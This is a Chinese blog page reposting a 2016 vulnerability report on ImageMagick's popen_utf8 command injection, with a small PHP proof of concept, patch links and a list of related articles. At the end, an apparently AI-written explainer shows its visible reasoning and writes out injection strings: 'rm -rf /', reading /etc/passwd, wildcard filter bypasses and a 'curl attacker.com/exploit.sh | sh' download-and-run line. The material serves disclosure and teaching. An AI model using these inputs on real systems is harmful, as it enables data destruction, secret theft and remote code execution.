ImageMagick popen_utf8 命令注入漏洞分析报告

最新推荐文章于 2024-06-29 08:00:00 发布
转载 最新推荐文章于 2024-06-29 08:00:00 发布 · 1.2k 阅读 · 1

ImageMagick在处理含特定字符的文件名时存在命令注入漏洞。通过构造恶意文件名,攻击者能执行任意系统命令。此漏洞影响广泛使用的ImageMagick版本。

ImageMagick popen_utf8 命令注入漏洞分析报告

时间:2016-08-09 17:07 来源:知道创宇404安全实验室 作者:SecYe安全 阅读:728次

一、漏洞概要

i. 漏洞描述

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。我发现当用户传入一个包含|竖线的文件名的时候,就有可能触发命令注入漏洞。

ii. 漏洞影响

测试:ImageMagick-7.0.1-2.tar.bz2

iii. 漏洞分析

ImageMagick在处理文件名时会调用OpenBlob()函数,在OpenBlob()函数中,代码2484行,判断文件名是否以|竖线开头,如果是,那么他会调用popoen_utf8()函数处理文件名,代码如图:

图片 1

来到popoen_utf8()函数,popen_utf8()函数调用会调用popen()函数打开文件,这样就导致我们可以注入系统命令,代码如图:

图片 1

iv. 漏洞利用(PHP)

在PHP禁用执行系统命令函数的时候,我们可以用他来绕过disable_funtion,PHP编写如下代码:

<?php
new Imagick('|touch /tmp/niubl');
?>

使用PHP执行,结果如图:

图片 1

二、修复方案

目前官方已经更新代码至 Gitlab,但最终修复版本还未发布,补丁细节可参考如下链接:

http://git.imagemagick.org/repos/ImageMagick/commit/40639d173aa8c76b850d625c630b711fee4dcfb

http://git.imagemagick.org/repos/ImageMagick/commit/4674b3e1ea87a69646a6dbac8772c45eeb20c9f0

三、漏洞时间线

2016.05.07 知道创宇404安全实验室niubl发现该漏洞

2016.05.29 国外研究者报告并公布了漏洞细节 http://permalink.gmane.org/gmane.comp.security.oss.general/19669

2016.05.30 发布分析报告

四、相关资源链接

http://www.imagemagick.org/download/beta/

http://permalink.gmane.org/gmane.comp.security.oss.general/19669

关于读取popen输出结果时未截断字符串导致的命令注入详解
08-27
主要给大家介绍了关于读取popen输出结果时未截断字符串导致的命令注入的相关资料,文中通过图文及示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
python os.popen基础/os.popen 安全注入(OS命令注入漏洞\subprocess.getstatusoutput OS命令注入漏洞)、python 过滤命令注入危险字符
西京刀客
04-29 8697
文章目录一、python OS命令注入漏洞1. 警惕subprocess.getstatusoutput OS命令注入漏洞2. os.popen OS命令注入漏洞os.popen基础python os.popen OS命令注入漏洞 一、python OS命令注入漏洞 1. 警惕subprocess.getstatusoutput OS命令注入漏洞 python直接执行代码漏洞_警惕OS命令注入漏洞 - python篇 参考URL: https://blog.youkuaiyun.com/weixin_3980585
命令注入漏洞总结
weixin_30755393的博客
08-03 1804
前言 漏洞本身原理很简单,用户的输入作为 要执行命令的一部分被 一些执行系统命令的函数去执行,如果不注意就能够让攻击者执行系统命令。 正文 相关的工具 https://github.com/ewilded/shelling https://github.com/commixproject/commix 测试环境 win 10 phpstudy https://github.com/commixpr...
将python3中os.popen()的默认编码由ascii修改为utf-8
教Linux的李老师
04-17 1461
如何将python3中os.popen()的默认编码由ascii修改为utf-8
python3默认编码_如何将 python3 中 os.popen()的默认编码由 ascii 修改为 ‘utf-8’ ?...
weixin_39526185的博客
11-23 1524
遇到一个编码问题,问题简化如下:在当前 desktop 目录下,有如下内容:desktop $ lsclient.pyserver.py中文测试arcpy.txtcodetest.pytest.py如上所示有一个中文命名的文件 ----> 中文测试# -*- coding:utf-8 -*-# python3.5.1import os,sysprint (sys.getdefaultencodin...
ImageMagick命令注入漏洞(CVE-2016–3714)
qq_68163788的博客
06-29 1067
ImageMagick命令注入漏洞(CVE-2016-3714)是一种安全漏洞,它影响了广泛使用的图像处理软件ImageMagick。该漏洞允许恶意用户通过操纵图像文件中嵌入的特定代码,来执行任意命令和从外部网络资源加载图片。这可能导致恶意用户在受影响的服务器上执行任意命令,引发各种潜在的安全风险。 对于系统管理员和开发人员来说,修复这种漏洞的最佳方法是升级到已经修复了这个问题的ImageMagick版本,并定期更新系统来防止类似漏洞的出现。此外,也可以禁用一些ImageMagick的功能
深入浅析ImageMagick命令执行漏洞
12-23
00 前言 什么是ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理...01 漏洞描述 ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PH
Imagemagick PDF密码位置命令注入漏洞(CVE-2020-29599)复现
玄道的网安博客
04-07 1325
漏洞概述 ImageMagick是一款使用量很广的图片处理程序,ImageMagick之前6.9.11-40和7。在7.0.10-40之前的x错误地处理了-authenticate选项,该选项允许为密码保护的PDF文件设置密码。用户控制的密码没有被正确转义,因此可以通过构造好的SVG格式图片文件,即可在Imagemagick注入任意命令。 环境搭建 https://github.com/vulhub/vulhub/tree/master/imagemagick/CVE-2020-...
Imagemagick PDF密码位置命令注入漏洞
黑白的博客
05-02 735
声明 好好学习,天天向上 漏洞描述 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。研究者@insertScript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞,通过构造好的SVG格式图片文件,即可在Imagemagick注入任意命令。 影响范围 7.0.10-35到7.0.10-40 6.9.11-35 up到
php 单引号绕过,利用UTF8字节编码能否绕过PHP单引号转义进行注入
weixin_30914751的博客
03-13 798
利用GBK双字节编码可以绕过单引号转义进行注入,这在之前的文章中已经分析过了(《利用GBK双字节编码突破PHP单引号转义限制进行SQL注入》,http://www.redicecn.com/html/wangluoanquan/20101018/180.html)。今天来讨论一下是否能够利用UTF8字节编码绕过转义。先回顾一下GBK编码绕转义的原理:GBK编码的字节范围是:首字节:0x81-0xF...
web安全之命令注入
weixin_54584489的博客
04-13 941
命令注入漏洞即web应用程序使用了可以操控相关系统命令的功能,又没有对用户输入进行过滤,导致攻击者可以通过拼接输入而执行系统命令
php imagemagick 漏洞,ImageMagick popen_utf8命令注入 漏洞报告
weixin_28956753的博客
03-10 238
Author: niubl(知道创宇404安全实验室)Date: 2016-05-07一、漏洞概要i. 漏洞描述ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。我发现当用户传入一个包含|竖线的文件名的时候,就有可能触发命令注入漏洞。ii. 漏洞影响测试:ImageMagick-7.0.1-2.tar.bz2iii...
SQL注入漏洞产生的原因?如何防止?
The Ning
08-17 1686
SQL 注入产生的原因:程序开发过程中不注意规范书写 sql 语句和对特殊字符进行过滤,导致客户端可以通过全局变量 POST 和 GET 提交一些 sql 语句正常执行。 防止 SQL 注入的方式: 1、 开启配置文件中的 magic_quotes_gpc 和 magic_quotes_runtime 设置 2、 执行 sql 语句时使用 addslashes 进行 sql 语句转换 3、
php 宽字节注入 转成utf8,【转】宽字节注入详解 - osc_qthcwpv9的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39646405的博客
03-23 185
前言在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。首先,宽字节注入与HTML页面编码是无关的,笔者曾经看到<meta charset=utf8>就放弃了尝试,这是一个误区,SQL注入不是XSS。虽然他们中编码...
命令注入与dvwa中的Command Injection
无痕的博客
01-17 1233
命令注入
Web安全——命令注入漏洞详解
热门推荐
Boom!脑洞大爆炸的博客
06-09 1万+
手把手入门命令注入漏洞
深入命令注入漏洞
Websec
10-23 9513
参考文章:https://mp.weixin.qq.com/s/VssTiWz-oExFqdEkiE9J4g   命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。说到这里,我们不得不提另外一个叫做远程代码执行(RCE)的漏洞。许多人总会把这两个漏洞混淆,其实它们是有本质的区别的。命令执行只是针对系统命令,而远程代码执行针对的是编程代码,两者互不能替换。下...
linux c之通过popen执行shell命令
码莎拉蒂
04-16 5124
1popen介绍 我是在ubuntu上面进行man popen的,解释如下 这个函数通过创建一个管道通过fork一个进程,然后执行一个command,因为在管道中,所以数据流是单向的,然后type一般只能是读“r”或者写“w”,返回值在IO流里面,用了popen之后我们要记得用pclose函数。 2 使用 #include <s...
PHP中字符串编码的一些问题(Malformed UTF-8 characters, possibly incorrectly encoded)
蓝枫秋千的踩坑记录
05-15 9058
问题:php报错Malformed UTF-8 characters, possibly incorrectly encoded 原因:有可能是数据库中部分字段编码有问题 // 先将数据库数据转成GBK,再转成UTF-8 $friend['name']=iconv("utf-8","gbk//IGNORE",$friend['name']); $friend['name'] = mb_convert_encoding($friend['name'],'UTF-8','GBK'); 字符串编码方法 // 获
命令注入漏洞原理
最新发布
03-26
<think>好的,我现在需要回答用户关于命令注入漏洞的工作原理、形成原因及利用机制的问题。首先,我应该回顾用户提供的引用资料,提取关键信息,并组织成结构清晰的回答。 首先,用户提到的四个引用中,引用[3]详细解释了命令注入漏洞的本质和工作机制,包括用户输入捕获、未过滤的输入、恶意构造和命令执行四个步骤。引用[1]和[4]提到了漏洞的形成原因,如代码层过滤不严、系统漏洞、第三方组件问题等。引用[2]虽然关于SQL注入,但可能对理解注入漏洞有帮助,不过这里主要关注命令注入。 我需要将形成原因和机制分开阐述。形成原因包括输入验证不足、直接拼接命令、系统或第三方漏洞。利用机制则是攻击者如何构造输入,绕过过滤,执行恶意命令。比如使用特殊字符如分号、管道符等分隔命令,或者利用环境变量注入。 同时,用户要求生成相关问题,我需要确保问题相关且覆盖漏洞防御、检测、案例、区别等方面。例如,如何防御,检测方法,历史案例,与代码执行漏洞的区别等。 要注意使用中文,数学公式用$...$,独立公式用$$...$$,但这里可能涉及较少数学内容。同时要自然添加引用标识,例如在解释过滤不严时引用[4],在机制部分引用[3]。 最后,确保回答结构清晰,分点说明原因和机制,并附上相关问题。避免使用Markdown格式,使用有序列表和段落分隔。检查是否符合所有系统级指令,如引用正确,LaTeX正确,生成的问题相关且合理。</think>### 命令注入漏洞的工作原理 #### 一、形成原因 1. **输入验证不足** 程序未对用户输入进行充分过滤或验证,直接将其与系统命令拼接。例如,使用`system()`函数调用时未处理用户可控参数[^4]。 例如:`system("ping " + user_input)`,若用户输入`8.8.8.8; rm -rf /`,会导致后续命令被执行。 2. **命令拼接逻辑不安全** 开发者将用户输入与固定命令字符串直接组合,未使用安全的参数化方式(如白名单或转义特殊字符)。例如: ```php $cmd = "nslookup " . $_GET['domain']; exec($cmd); // 直接拼接存在风险 ``` 3. **依赖不安全的环境或组件** - 系统本身存在漏洞(如CVE-2014-6271 Bash破壳漏洞)。 - 第三方库(如ImageMagick、Struts2)存在命令执行缺陷。 #### 二、利用机制 攻击者通过以下步骤实现命令注入: 1. **构造恶意输入** 在用户输入中插入命令分隔符(如`;`、`&&`、`|`)或环境变量注入符号(如`${}`)。 示例:输入`example.com; cat /etc/passwd`,拼接后命令变为: $$ \text{nslookup example.com; cat /etc/passwd} $$ 2. **绕过过滤规则** - 使用编码或通配符绕过黑名单过滤,如`\u003b`(Unicode分号)或`/???/passwd`(通配符匹配路径)[^3]。 - 利用环境变量注入:`$(id)`或`` `id` ``执行子命令。 3. **执行任意命令** 恶意输入被操作系统解释为合法命令,导致信息泄露、数据破坏或系统控制。例如: ```bash curl http://attacker.com/exploit.sh | sh # 下载并执行恶意脚本 ``` #### 三、典型场景 - Web应用调用命令行工具(如Ping、Dig)。 - 内容管理系统(CMS)调用外部程序处理文件上传[^1]。 - 服务器管理界面执行系统命令(如重启服务)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值